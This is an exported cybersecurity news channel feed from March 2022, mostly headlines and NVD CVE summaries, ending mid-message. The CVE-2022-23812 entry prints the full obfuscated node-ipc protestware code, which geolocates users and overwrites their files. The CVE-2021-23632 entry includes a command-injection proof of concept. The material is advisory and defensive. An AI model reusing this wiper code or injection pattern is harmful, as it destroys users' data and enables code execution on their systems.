messages40.html

<!DOCTYPE html>
<html>

 <head>

  <meta charset="utf-8"/>
<title>Exported Data</title>
  <meta content="width=device-width, initial-scale=1.0" name="viewport"/>

  <link href="css/style.css" rel="stylesheet"/>

  <script src="js/script.js" type="text/javascript">

  </script>

 </head>

 <body onload="CheckLocation();">

  <div class="page_wrap">

   <div class="page_header">

    <div class="content">

     <div class="text bold">
🛡 Cybersecurity &amp; Privacy news 🛡 
     </div>

    </div>

   </div>

   <div class="page_body chat_page">

    <div class="history">

     <a class="pagination block_link" href="messages39.html">
Previous messages
     </a>

     <div class="message service" id="message-1079">

      <div class="body details">
16 March 2022
      </div>

     </div>

     <div class="message default clearfix" id="message39098">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="16.03.2022 14:45:19">
14:45
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>🛠 OpenSSL Toolkit 3.0.2 🛠</strong><br><br><code>OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols with full-strength cryptography world-wide. The 3.x series is the current major version of OpenSSL.</code><br><br><a href="https://packetstormsecurity.com/files/166342/openssl-3.0.2.tar.gz">📖 Read</a><br><br>via &quot;<em>Packet Storm Security</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39099">

      <div class="body">

       <div class="pull_right date details" title="16.03.2022 14:55:33">
14:55
       </div>

       <div class="text">
<strong>❌ ‘CryptoRom’ Crypto-Scam is Back via Side-Loaded Apps ❌</strong><br><br><code>Scammers are bypassing Apple&apos;s App Store security, stealing thousands of dollars’ worth of cryptocurrency from the unwitting, using the TestFlight and WebClips programs.</code><br><br><a href="https://threatpost.com/cryptorom-crypto-scam-side-loaded-apple-apps/178942/">📖 Read</a><br><br>via &quot;<em>Threat Post</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39100">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="16.03.2022 15:20:32">
15:20
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>‼ CVE-2021-23648 ‼</strong><br><br><code>The package @braintree/sanitize-url before 6.0.0 are vulnerable to Cross-site Scripting (XSS) due to improper sanitization in sanitizeUrl function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-23648">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39101">

      <div class="body">

       <div class="pull_right date details" title="16.03.2022 15:20:33">
15:20
       </div>

       <div class="text">
<strong>‼ CVE-2022-21164 ‼</strong><br><br><code>The package node-lmdb before 0.9.7 are vulnerable to Denial of Service (DoS) when defining a non-invokable ToString value, which will cause a crash during type check.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-21164">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39102">

      <div class="body">

       <div class="pull_right date details" title="16.03.2022 15:20:34">
15:20
       </div>

       <div class="text">
<strong>‼ CVE-2022-23812 ‼</strong><br><br><code>This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don&apos;t run it! js import u from &quot;path&quot;; import a from &quot;fs&quot;; import o from &quot;https&quot;; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t &gt; 1) { return; } const n = Buffer.from(&quot;aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=&quot;, &quot;base64&quot;); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString(&quot;utf8&quot;), function (t) { t.on(&quot;data&quot;, function (t) { const n = Buffer.from(&quot;Li8=&quot;, &quot;base64&quot;); const o = Buffer.from(&quot;Li4v&quot;, &quot;base64&quot;); const r = Buffer.from(&quot;Li4vLi4v&quot;, &quot;base64&quot;); const f = Buffer.from(&quot;Lw==&quot;, &quot;base64&quot;); const c = Buffer.from(&quot;Y291bnRyeV9uYW1l&quot;, &quot;base64&quot;); const e = Buffer.from(&quot;cnVzc2lh&quot;, &quot;base64&quot;); const i = Buffer.from(&quot;YmVsYXJ1cw==&quot;, &quot;base64&quot;); try { const s = JSON.parse(t.toString(&quot;utf8&quot;)); const u = s[c.toString(&quot;utf8&quot;)].toLowerCase(); const a = u.includes(e.toString(&quot;utf8&quot;)) || u.includes(i.toString(&quot;utf8&quot;)); // checks if country is Russia or Belarus if (a) { h(n.toString(&quot;utf8&quot;)); h(o.toString(&quot;utf8&quot;)); h(r.toString(&quot;utf8&quot;)); h(f.toString(&quot;utf8&quot;)); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = &quot;&quot;, o = &quot;&quot;) { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from(&quot;4p2k77iP&quot;, &quot;base64&quot;); for (var e = 0; e &lt; r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length &gt; 0 ? f.push(...s) : null; } else if (i.indexOf(o) &gt;= 0) { try { a.writeFile(i, c.toString(&quot;utf8&quot;), function () {}); // overwrites file with ?? } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-23812">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39103">

      <div class="body">

       <div class="pull_right date details" title="16.03.2022 15:20:36">
15:20
       </div>

       <div class="text">
<strong>‼ CVE-2021-45822 ‼</strong><br><br><code>A cross-site scripting vulnerability is present in Xbtit 3.1. The stored XSS vulnerability occurs because /ajaxchat/sendChatData.php does not properly validate the value of the &quot;n&quot; (POST) parameter. Through this vulnerability, an attacker is capable to execute malicious JavaScript code.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-45822">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39104">

      <div class="body">

       <div class="pull_right date details" title="16.03.2022 15:20:38">
15:20
       </div>

       <div class="text">
<strong>‼ CVE-2022-24729 ‼</strong><br><br><code>CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. CKEditor4 prior to version 4.18.0 contains a vulnerability in the `dialog` plugin. The vulnerability allows abuse of a dialog input validator regular expression, which can cause a significant performance drop resulting in a browser tab freeze. A patch is available in version 4.18.0. There are currently no known workarounds.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24729">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39105">

      <div class="body">

       <div class="pull_right date details" title="16.03.2022 15:20:40">
15:20
       </div>

       <div class="text">
<strong>‼ CVE-2022-24728 ‼</strong><br><br><code>CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A vulnerability has been discovered in the core HTML processing module and may affect all plugins used by CKEditor 4 prior to version 4.18.0. The vulnerability allows someone to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code. This problem has been patched in version 4.18.0. There are currently no known workarounds.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24728">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39106">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="16.03.2022 18:36:24">
18:36
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>🕴 Microsoft the No. 1 Most-Spoofed Brand in Phishing Attacks 🕴</strong><br><br><code>New Barracuda Networks data shows attackers sent some 3 million emails from around 12,000 pilfered accounts.</code><br><br><a href="https://www.darkreading.com/vulnerabilities-threats/microsoft-the-1-most-spoofed-brand-in-phishing-attacks">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39107">

      <div class="body">

       <div class="pull_right date details" title="16.03.2022 18:36:25">
18:36
       </div>

       <div class="text">
<strong>🕴 What the Newly Signed US Cyber-Incident Law Means for Security 🕴</strong><br><br><code>Bipartisan cybersecurity legislation comes amid increased worries over ransomware, and fears of cyberattacks from Russia in the wake of its invasion of Ukraine.</code><br><br><a href="https://www.darkreading.com/attacks-breaches/new-cyber-incident-law-not-a-national-breach-law-but-a-major-first-step">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39108">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="16.03.2022 19:20:44">
19:20
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>‼ CVE-2022-26295 ‼</strong><br><br><code>A stored cross-site scripting (XSS) vulnerability in /ptms/?page=user of Online Project Time Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the user name field.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26295">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39109">

      <div class="body">

       <div class="pull_right date details" title="16.03.2022 19:20:45">
19:20
       </div>

       <div class="text">
<strong>‼ CVE-2022-26293 ‼</strong><br><br><code>Online Project Time Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in the function save_employee at /ptms/classes/Users.php.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26293">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39110">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="16.03.2022 19:36:33">
19:36
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>🕴 4 Critical Capabilities for a SaaS Security Posture Management (SSPM) Solution 🕴</strong><br><br><code>The need for deep visibility and remediation for SaaS security settings is critical. If you&apos;re considering a SaaS Security Posture Management solution, here’s a checklist of what to look for.</code><br><br><a href="https://www.darkreading.com/cloud/4-critical-capabilities-for-a-saas-security-posture-management-sspm-solution-">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39111">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="16.03.2022 20:12:43">
20:12
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>🕴 How Pen Testing Gains Critical Security Buy-in and Defense Insight 🕴</strong><br><br><code>It&apos;s more important than ever for companies to challenge their defenses, learning about new gaps and opportunities for improvement along the way.</code><br><br><a href="https://www.darkreading.com/edge-articles/how-pen-testing-gains-critical-security-buy-in-and-defense-insight">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39112">

      <div class="body">

       <div class="pull_right date details" title="16.03.2022 20:12:45">
20:12
       </div>

       <div class="text">
<strong>🕴 TAC Security Survey Reveals: 88% of Businesses Rely on Manual Processes to Identify Network Vulnerabilities 🕴</strong><br><br><br><br><a href="https://www.darkreading.com/perimeter/tac-security-survey-reveals-88-of-businesses-rely-on-manual-processes-to-identify-network-vulnerabilities">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message service" id="message-1080">

      <div class="body details">
17 March 2022
      </div>

     </div>

     <div class="message default clearfix" id="message39113">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 07:21:17">
07:21
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>‼ CVE-2022-24075 ‼</strong><br><br><code>Whale browser before 3.12.129.18 allowed extensions to replace JavaScript files of the HWP viewer website which could access to local HWP files. When the HWP files were opened, the replaced script could read the files.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24075">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39114">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 07:21:18">
07:21
       </div>

       <div class="text">
<strong>‼ CVE-2022-24074 ‼</strong><br><br><code>Whale Bridge, a default extension in Whale browser before 3.12.129.18, allowed to receive any SendMessage request from the content script itself that could lead to controlling Whale Bridge if the rendering process compromises.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24074">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39115">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 07:21:19">
07:21
       </div>

       <div class="text">
<strong>‼ CVE-2022-24073 ‼</strong><br><br><code>The Web Request API in Whale browser before 3.12.129.18 allowed to deny access to the extension store or redirect to any URL when users access the store.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24073">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39116">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 07:21:20">
07:21
       </div>

       <div class="text">
<strong>‼ CVE-2022-24072 ‼</strong><br><br><code>The devtools API in Whale browser before 3.12.129.18 allowed extension developers to inject arbitrary JavaScript into the extension store web page via devtools.inspectedWindow, leading to extensions downloading and uploading when users open the developer tool.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24072">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39117">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 09:26:22">
09:26
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>‼ CVE-2022-1000 ‼</strong><br><br><code>Path Traversal in GitHub repository prasathmani/tinyfilemanager prior to 2.4.7.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-1000">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39118">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 09:26:24">
09:26
       </div>

       <div class="text">
<strong>‼ CVE-2021-45791 ‼</strong><br><br><code>Slims8 Akasia 8.3.1 is affected by SQL injection in /admin/modules/bibliography/index.php, /admin/modules/membership/member_type.php, /admin/modules/system/user_group.php, and /admin/modules/membership/index.php through the dir parameter. It can be used by remotely authenticated librarian users.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-45791">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39119">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 09:26:25">
09:26
       </div>

       <div class="text">
<strong>‼ CVE-2021-45792 ‼</strong><br><br><code>Slims9 Bulian 9.4.2 is affected by Cross Site Scripting (XSS) in /admin/modules/system/custom_field.php.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-45792">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39120">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 09:32:05">
09:32
       </div>

       <div class="text">
<strong>🕴 Enhancing DLP With Natural Language Understanding for Better Email Security 🕴</strong><br><br><code>Natural language understanding is well-suited for scanning enterprise email to detect and filter out spam and other malicious content. Armorblox introduces a data loss prevention service to its email security platform using NLU.</code><br><br><a href="https://www.darkreading.com/emerging-tech/enhancing-dlp-with-natural-language-understanding-for-better-email-security">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39121">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 10:00:16">
10:00
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>🗓️ ‘Fox guarding the henhouse’ – Founder of cyber-fraud prevention company pleads guilty to defrauding investors 🗓️</strong><br><br><code>Adam Rogas has been charged with using fraudulent financial data to secure more than $100m in funding</code><br><br><a href="https://portswigger.net/daily-swig/fox-guarding-the-henhouse-founder-of-cyber-fraud-prevention-company-pleads-guilty-to-defrauding-investors">📖 Read</a><br><br>via &quot;<em>The Daily Swig</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39122">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 10:00:17">
10:00
       </div>

       <div class="text">
<strong>📢 Germany advises against using Kaspersky software due to hacking risk 📢</strong><br><br><code>The Moscow-headquartered cyber security company has a history of being targeted for its alleged links to the Russian state</code><br><br><a href="https://www.itpro.co.uk/security/cyber-security/366989/germany-warns-kaspersky-software-cyber-security-risk">📖 Read</a><br><br>via &quot;<em>ITPro</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39123">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 10:00:19">
10:00
       </div>

       <div class="text">
<strong>📢 NortonLifeLock and Avast merger could reduce competition, CMA warns 📢</strong><br><br><code>The watchdog will launch a phase two investigation into the merger unless NortonLifeLock and Avast address its concerns within five days</code><br><br><a href="https://www.itpro.co.uk/business-strategy/mergers-and-acquisitions/366994/nortonlifelock-avast-merger-could-reduce-competition-cma">📖 Read</a><br><br>via &quot;<em>ITPro</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39124">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 10:00:20">
10:00
       </div>

       <div class="text">
<strong>📢 NSW ditches e-voting system for 2023 election 📢</strong><br><br><code>The electoral commissioner has suggested there should be a review of internet voting following the problems with the system found last December</code><br><br><a href="https://www.itpro.co.uk/business/policy-legislation/366990/nsw-ditches-ivote-2023-election">📖 Read</a><br><br>via &quot;<em>ITPro</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39125">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 10:28:49">
10:28
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>⚠ CISA warning: “Russian actors bypassed 2FA” – what happened and how to avoid it ⚠</strong><br><br><code>Don&apos;t leave old accounts lying around where someone sketchy could reactivate them.</code><br><br><a href="https://nakedsecurity.sophos.com/2022/03/16/russian-actors-bypass-2fa-story-what-happened-and-how-to-avoid-it/">📖 Read</a><br><br>via &quot;<em>Naked Security</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39126">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 10:28:50">
10:28
       </div>

       <div class="text">
<strong>⚠ Beware bogus Betas – cryptocoin scammers abuse Apple’s TestFlight system ⚠</strong><br><br><code>&quot;Install this moneymaking app&quot; - this one is so special that it isn&apos;t available on Google Play or the App Store!</code><br><br><a href="https://nakedsecurity.sophos.com/2022/03/16/beware-bogus-betas-cryptocoin-scammers-abuse-apples-testflight-system/">📖 Read</a><br><br>via &quot;<em>Naked Security</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39127">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:02:10">
11:02
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>⚠ S3 Ep74: Cybercrime busts, Apple patches, Pi Day, and disconnect effects [Podcast] ⚠</strong><br><br><code>Latest episode - listen now!</code><br><br><a href="https://nakedsecurity.sophos.com/2022/03/17/s3-ep74-cybercrime-busts-apple-patches-pi-day-and-disconnect-effects-podcast/">📖 Read</a><br><br>via &quot;<em>Naked Security</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39128">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:02:12">
11:02
       </div>

       <div class="text">
<strong>🕴 Cut Down on Alert Overload and Leverage Layered Security Measures 🕴</strong><br><br><code>Feeling overwhelmed by the number of alerts? It doesn&apos;t have to be that way.</code><br><br><a href="https://www.darkreading.com/attacks-breaches/cut-down-on-alert-overload-and-leverage-layered-security-measures">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39129">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:21:28">
11:21
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>‼ CVE-2022-24761 ‼</strong><br><br><code>Waitress is a Web Server Gateway Interface server for Python 2 and 3. When using Waitress versions 2.1.0 and prior behind a proxy that does not properly validate the incoming HTTP request matches the RFC7230 standard, Waitress and the frontend proxy may disagree on where one request starts and where it ends. This would allow requests to be smuggled via the front-end proxy to waitress and later behavior. There are two classes of vulnerability that may lead to request smuggling that are addressed by this advisory: The use of Python&apos;s `int()` to parse strings into integers, leading to `+10` to be parsed as `10`, or `0x01` to be parsed as `1`, where as the standard specifies that the string should contain only digits or hex digits; and Waitress does not support chunk extensions, however it was discarding them without validating that they did not contain illegal characters. This vulnerability has been patched in Waitress 2.1.1. A workaround is available. When deploying a proxy in front of waitress, turning on any and all functionality to make sure that the request matches the RFC7230 standard. Certain proxy servers may not have this functionality though and users are encouraged to upgrade to the latest version of waitress instead.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24761">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39130">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:21:29">
11:21
       </div>

       <div class="text">
<strong>‼ CVE-2021-23632 ‼</strong><br><br><code>All versions of package git are vulnerable to Remote Code Execution (RCE) due to missing sanitization in the Git.git method, which allows execution of OS commands rather than just git commands. Steps to Reproduce 1. Create a file named exploit.js with the following content: js var Git = require(&quot;git&quot;).Git; var repo = new Git(&quot;repo-test&quot;); var user_input = &quot;version; date&quot;; repo.git(user_input, function(err, result) { console.log(result); }) 2. In the same directory as exploit.js, run npm install git. 3. Run exploit.js: node exploit.js. You should see the outputs of both the git version and date command-lines. Note that the repo-test Git repository does not need to be present to make this PoC work.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-23632">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39131">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:21:31">
11:21
       </div>

       <div class="text">
<strong>‼ CVE-2021-44260 ‼</strong><br><br><code>A vulnerability is in the &apos;live_mfg.html&apos; page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information of the manager of router.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44260">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39132">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:21:32">
11:21
       </div>

       <div class="text">
<strong>‼ CVE-2021-44908 ‼</strong><br><br><code>SailsJS Sails.js &lt;=1.4.0 is vulnerable to Prototype Pollution via controller/load-action-modules.js, function loadActionModules().</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44908">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39133">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:21:33">
11:21
       </div>

       <div class="text">
<strong>‼ CVE-2021-44261 ‼</strong><br><br><code>A vulnerability is in the &apos;BRS_top.html&apos; page of the Netgear W104, version WAC104-V1.0.4.13, which can allow a remote attacker to access this page without any authentication. When processed, it exposes firmware version information for the device.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44261">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39134">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:21:34">
11:21
       </div>

       <div class="text">
<strong>‼ CVE-2021-44262 ‼</strong><br><br><code>A vulnerability is in the &apos;MNU_top.htm&apos; page of the Netgear W104, version WAC104-V1.0.4.13, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information for the device.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44262">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39135">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:21:36">
11:21
       </div>

       <div class="text">
<strong>‼ CVE-2022-25352 ‼</strong><br><br><code>The package libnested before 1.5.2 are vulnerable to Prototype Pollution via the set function in index.js. **Note:** This vulnerability derives from an incomplete fix for [CVE-2020-28283](https://security.snyk.io/vuln/SNYK-JS-LIBNESTED-1054930)</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25352">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39136">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:21:37">
11:21
       </div>

       <div class="text">
<strong>‼ CVE-2022-21221 ‼</strong><br><br><code>The package github.com/valyala/fasthttp before 1.34.0 are vulnerable to Directory Traversal via the ServeFile function, due to improper sanitization. It is possible to be exploited by using a backslash %5c character in the path. **Note:** This security issue impacts Windows users only.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-21221">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39137">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:21:38">
11:21
       </div>

       <div class="text">
<strong>‼ CVE-2022-25760 ‼</strong><br><br><code>All versions of package accesslog are vulnerable to Arbitrary Code Injection due to the usage of the Function constructor without input sanitization. If (attacker-controlled) user input is given to the format option of the package&apos;s exported constructor function, it is possible for an attacker to execute arbitrary JavaScript code on the host that this package is being run on.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25760">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39138">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:21:39">
11:21
       </div>

       <div class="text">
